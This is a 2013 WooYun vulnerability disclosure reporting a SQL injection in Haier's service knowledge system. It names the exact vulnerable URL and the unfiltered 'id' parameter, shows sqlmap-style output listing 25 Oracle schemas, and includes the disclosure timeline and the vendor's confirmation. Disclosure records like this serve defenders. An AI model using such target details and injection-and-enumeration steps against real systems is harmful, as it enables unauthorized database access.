当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033798

漏洞标题:海尔集团系列5某系统DBA注射

相关厂商:海尔集团

漏洞作者: 小胖子

提交时间:2013-08-08 11:52

修复时间:2013-09-22 11:53

公开时间:2013-09-22 11:53

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-08: 细节已通知厂商并且等待厂商处理中
2013-08-09: 厂商已经确认,细节仅向厂商公开
2013-08-19: 细节向核心白帽子及相关领域专家公开
2013-08-29: 细节向普通白帽子公开
2013-09-08: 细节向实习白帽子公开
2013-09-22: 细节向公众公开

简要描述:

小胖子正在暴走!!
小胖子已经杀人如麻!!
暴走了就睡了,太困了,明天接着发!

详细说明:

缺陷系统:http://cskb.ithaier.com/ 海尔服务知识系统
注入地址 http://cskb.ithaier.com/sysadm/thinkpad/indexpheno.jsp?id=1374284517391&parentCategoryID=1101210294169
参数 id 没有做过滤 导致注入。

SQLIN.jpg


CC.jpg


oracle的数据库,数据库还很多啊。

漏洞证明:

得到的数据库。当前数据CC。

available databases [25]:
[*] CC
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB

修复方案:

0x1:过滤,没什么好说的了。
0x2:求礼物,求20rank!

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-09 10:27

厂商回复:

感谢 @小胖子 的工作,根据提供的线索,整改如下:
网站开发于2008年,当时软件开发存在疏漏之处,已经针对本系统软件与相关开发人员沟通,短期整改。
请白帽子们持续友好监督海尔信息安全工作,非常感谢。

最新状态:

暂无